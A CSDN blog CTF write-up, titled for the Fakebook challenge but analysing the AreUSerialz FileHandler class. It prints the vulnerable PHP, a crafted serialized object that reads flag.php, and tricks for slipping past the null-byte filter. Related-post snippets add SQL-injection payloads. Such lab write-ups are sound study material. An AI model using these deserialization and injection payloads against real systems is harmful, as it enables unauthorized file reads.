[buuctf][网鼎杯 2018]Fakebook 构造反序列化

最新推荐文章于 2024-04-24 17:24:28 发布
最新推荐文章于 2024-04-24 17:24:28 发布
阅读量260 收藏
点赞数
分类专栏: ctf 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37301470/article/details/121450659
版权

源码分析

get方法获得str
if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

反序列化赋值给obj
看看这个类

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

__construct 当一个对象创建时被调用
__destruct 当一个对象销毁时被调用
__toString 当一个对象被当作一个字符串使用
__sleep 在对象被序列化之前运行
__wakeup 在对象被反序列化之后被调用

类中的成员
op=1    filename      content 长度小于100    写文件
op=2    filename 	读文件     

析构函数 op:2--->1   如果op=2则修改成1,再用空文件写入覆盖,所以不能让他成功执行,由于op==="2"用的是字符串强比较,故而可以利用弱类型比较让op=1 (int)绕过if判断

构造反序列化

注:类名要相同,成员名字也要相同

class FileHandler
{
    protected $op;
    protected $filename;
    protected $content;
    public function __construct($op,$filename,$content)
    {
        $this->op=$op;
        $this->filename=$filename;
        $this->content=$content;
    }
    
}
    $ccc=new FileHandler(2,"flag.php","accc");
    $key=serialize($ccc);
    echo($key);

得到
O:11:"FileHandler":3:{s:5:"*op";i:2;s:11:"*filename";s:8:"flag.php";s:10:"*content";s:4:"accc";}

绕过过滤

如果是protected则会有无法显示的字符\x00*\x00,且ascii为0,会被过滤
如果是private则会在变量名前加上\x00类名\x00
一般需要url编码,若在本地存储更推荐采用base64编码的形式,如下:echo base64_decode($str);

本题有两种方法绕过过滤

一:php7.1+版本对属性类型不敏感,本地序列化的时候将属性改为public就可以了。
二:把s改成大写,以16进制表示

重要

php7.1+版本对属性类型不敏感
类名要相同,成员名字也要相同
捞氘河水怪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf】MRCTF2020-Ezpop小白详解
m0_73860001的博客
03-15 986
真的很详细
BUUCTF—WEB-WarmUp
热门推荐
迷风小白
06-25 1万+
拿到题目,一个表情包,顺便扫一下目录
BUUCTF [web专项33][网鼎杯 2018]Fakebook
yanglinchiji的博客
11-13 65
先登录,万能密码登录发现不行选择注册,随便注册一个进入用户界面发现url有很经典的模板 no=1尝试注入发现报错注入可以显示先来查列数爆库名(全部)最有可能库的还是fakebook查表查字段查数据可以看到有考验反序列化的地方但是我突然想到之前有一道题可以注入一个临时用户或许可以改变blog来修改。
BUUCTF Fakebook
weixin_44377940的博客
03-18 937
注册一个admin账户,然后登陆,没有发现什么东西。 点进view.php一看,发现好像有个注入点。 尝试注入,发现对union进行了过滤,可以用/**/进行绕过。 可以看到有一个反序列化,然后我就没有思路了。 看了wp才知道,还有个备份文件user.php.bak和flag.php,user.php.bak代码如下: <?php class UserInfo { public...
BUUCTF——[网鼎杯 2018]Fakebook
最新发布
m_de_g的博客
04-24 499
【代码】BUUCTF——[网鼎杯 2018]Fakebook
BUUCTF[网鼎杯 2018]Fakebook
qq_62078839的博客
03-16 2368
打开连接,发现登录要注册,那我们先注册个账号 发现可以点进去查看 习惯性查看网页源代码 点击发现打开了我们注册博客的地址,猜测可能存在SSRF,但现在还不知道如何使用,我们再来审查其他地方 发现个注入点,尝试sql注入 首先查列数 payload:?no=1 order by 5 发现报错 将列数改为4,发现正确 payload:no=-1 union/**/select 1,2,3,4 发现回显是第二个字段的位置,注意这里出现的序列化,可...
fakebook:Facebook的克隆
05-23
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 ...数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) 部署说明 ...
mp12_social_network_fakebook_person
05-15
Mp12-社交网络(Fakebook)(人)[ManyToMany] 该应用程序将具有一个名为Person的实体,可以通过/ persons端点进行管理。 帖子将添加一个人,获取将显示所有这些人。 为了使一个人与另一个人成为朋友,我们将向终端...
fakebook-backend:学习个人项目探索MERN堆栈
04-10
Fakebook后端(express和mongodb)(这是一个学习/探索MERN堆栈的个人项目)入门: 确保已安装节点克隆仓库在fakebook文件夹中,创建一个带有dev.env文件的配置文件夹设置环境变量:PORT:value,MONGODB_URL = ...
Fakebook-Day2:在第2天之后,在完善蓝图功能之前
03-31
在“Fakebook-Day2:在第2天之后,在完善蓝图功能之前”这个项目中,我们主要探讨的是如何利用Python编程语言来构建一个类似Facebook的社交网络平台。在第二天的开发阶段,我们的重点在于完善项目的蓝图(Blueprint)...
webcrawler:一个简单的Java实现的网络爬虫,支持自动登录
06-24
第一个网络爬虫介绍Webcrawler 是一个简单的网络爬虫。 它实现了自动登录和内容获取的基本功能。... 如果登录失败,程序将被终止。 登录后,爬虫将开始获取它可以在网站内找到的每个链接。 过滤器用于阻止爬虫获取外部...
AreUSerialz-[网鼎杯 2020 青龙组]-[传送门->BUUCTF]
qwsn
11-23 1658
0x01、Web 1.AreUSerialz-[网鼎杯 2020 青龙组]-[传送门->BUUCTF] 第一步:打开题目环境,进行代码审计 <?php include("flag.php"); //文件包含flag.php highlight_file(__FILE__); //高亮显示当前页面源码 class FileHandler { //类:FileHandler protected $op; //保护属性:$op protected $
CTF学习-WEB-PHP反序列化-[网鼎杯 2020 青龙组]AreUSerialz 1
qq_43564182的博客
07-13 627
步骤思路 第一:获取flag存储flag.php 第二:两个魔术方法__destruct __construct 第三:传输str参数数据后触发destruct,存在is_valid过滤 第四:__destruct中会调用process,其中op=1写入及op=2读取 第五:涉及对象FileHandler,变量op及filename,content,进行构造输出** 解题 打开网页发现如下代码: <?php include("flag.php"); highlight_file(__FILE__
2020网鼎杯(青龙组)--WEB--AreUSerialz(反序列化
a965527596的博客
05-17 2320
AreUSerialz 1.题目直接给出源码,分析源码发现是反序列漏洞,读代码发现通过get传入参数str,然后会利用is_valid()函数进行检测是否合法,函数限制只能出现ascii值在32-125之间的字符,而protected类型序列化出现的%00标识被url解码后ascii值为0,会被检测到,但是因为php7.1+对类属性的检测不严格,所以可以直接用public来进行序列化。 <?php include("flag.php"); highlight_file(__FILE__);
protected反序列化特点
qq_48511129的博客
12-13 1061
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hel
PHP封装成类(文件上传)
zhimab的博客
07-23 2685
<?php /** * Created by PhpStorm. * User: huang * Date: 2017/7/19 * Time: 23:20 */header("content-type:text/html;charset=utf-8");$new = new upload();class upload{ protected $fileName; protected $fileIn
代码审计:[网鼎杯 2020 青龙组]AreUSerialz
fightte的博客
05-18 133
更长: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content
[网鼎杯 2020 青龙组]AreUSerialz 1
bazzza的博客
12-21 2192
打开靶场,是一道php代码审计的题目,是个反序列化的题目 分块对代码进行分析,先分析输入部分 function is_valid($s) { for($i = 0; $i < strlen($s); $i++) if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))//限制字符串的范围 return false; return true; } if(isset($_GET{'st
PHP反序列化漏洞&网鼎杯ctf实例
weixin_44769042的博客
09-22 1130
漏洞简介 php反序列化漏洞,又叫php对象注入漏洞。 简单来讲,就是在php反序列化的时候,反序列化的内容是用户可控,那么恶意用户就可以构造特定序列化内容的代码,通过unserialize()函数进行特定的反序列化操作,并且程序的某处存在一些敏感操作是写在类中的,那么就可以通过这段恶意代码,达到执行攻击者想要的操作。 漏洞形成原因 漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。 什么是序.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值